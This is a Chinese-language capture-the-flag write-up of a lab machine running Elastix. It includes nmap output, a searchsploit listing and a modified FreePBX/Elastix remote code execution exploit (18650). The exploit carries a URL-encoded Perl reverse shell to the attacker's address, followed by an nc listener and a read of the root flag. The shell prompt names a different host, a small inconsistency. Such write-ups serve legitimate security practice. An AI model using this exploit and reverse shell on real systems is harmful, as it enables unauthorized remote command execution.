前言
继续练,前期计划每天四个简单的。
信息搜集
老规矩,扫一波。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
|
Scanning 10.10.10.7 [1000 ports]
Discovered open port 995/tcp on 10.10.10.7
Discovered open port 80/tcp on 10.10.10.7
Discovered open port 110/tcp on 10.10.10.7
Discovered open port 25/tcp on 10.10.10.7
Discovered open port 993/tcp on 10.10.10.7
Discovered open port 143/tcp on 10.10.10.7
Discovered open port 3306/tcp on 10.10.10.7
Discovered open port 22/tcp on 10.10.10.7
Discovered open port 111/tcp on 10.10.10.7
Discovered open port 443/tcp on 10.10.10.7
Discovered open port 4445/tcp on 10.10.10.7
Discovered open port 10000/tcp on 10.10.10.7
Completed SYN Stealth Scan at 15:57, 3.65s elapsed (1000 total ports)
Initiating Service scan at 15:57
Scanning 12 services on 10.10.10.7
Completed Service scan at 16:00, 166.79s elapsed (12 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.7
Retrying OS detection (try #2) against 10.10.10.7
Retrying OS detection (try #3) against 10.10.10.7
Retrying OS detection (try #4) against 10.10.10.7
Retrying OS detection (try #5) against 10.10.10.7
Initiating Traceroute at 16:00
Completed Traceroute at 16:00, 0.59s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:00
Completed Parallel DNS resolution of 2 hosts. at 16:00, 0.00s elapsed
NSE: Script scanning 10.10.10.7.
Initiating NSE at 16:00
Completed NSE at 16:03, 189.90s elapsed
Initiating NSE at 16:03
Completed NSE at 16:03, 2.22s elapsed
Nmap scan report for 10.10.10.7
Host is up (0.42s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: UIDL APOP PIPELINING STLS EXPIRE(NEVER) TOP RESP-CODES USER AUTH-RESP-CODE LOGIN-DELAY(0) IMPLEMENTATION(Cyrus POP3 server v2)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: SORT UIDPLUS QUOTA ID Completed OK UNSELECT URLAUTHA0001 NO NAMESPACE ACL STARTTLS X-NETSCAPE RIGHTS=kxte MAILBOX-REFERRALS THREAD=ORDEREDSUBJECT LIST-SUBSCRIBED ATOMIC IMAP4 CHILDREN CONDSTORE CATENATE ANNOTATEMORE THREAD=REFERENCES LITERAL+ SORT=MODSEQ BINARY MULTIAPPEND IDLE LISTEXT RENAME IMAP4rev1
443/tcp open ssl/https?
|_ssl-date: 2019-07-30T07:57:32+00:00; -2m58s from scanner time.
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|
发现Web,Elastix
,这种最简单的可以之搜索EXP。
利用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
searchsploit Elastix
---------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
---------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
|
这里用18650,有个恶心的问题是这个机器证书过期了,还得改改代码。
1
2
3
|
cp /usr/share/exploitdb/exploits/php/webapps/18650.py .
pluma 18650.py
|
改写后EXP
1
2
3
4
5
6
7
8
9
10
11
12
|
#!/usr/bin/python
import urllib
import ssl
rhost="10.10.10.7"
lhost="10.10.16.95"
lport=443
extension="1000"
ssl._create_default_https_context = ssl._create_unverified_context
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
|
反弹 nc
1
2
|
nc -lvvp 443
python 18650.py
|
切换常规bash。
1
|
python -c 'import pty; pty.spawn("/bin/bash")'
|
获取flag
1
2
3
4
5
6
7
|
root@lame:/## cd /root
cd /root
root@lame:/root## ls
ls
Desktop reset_logs.sh root.txt vnc.log
root@lame:/root## cat root.txt
cat root.txt
|
总结
简单的漏洞复现,可以练习下msf的使用。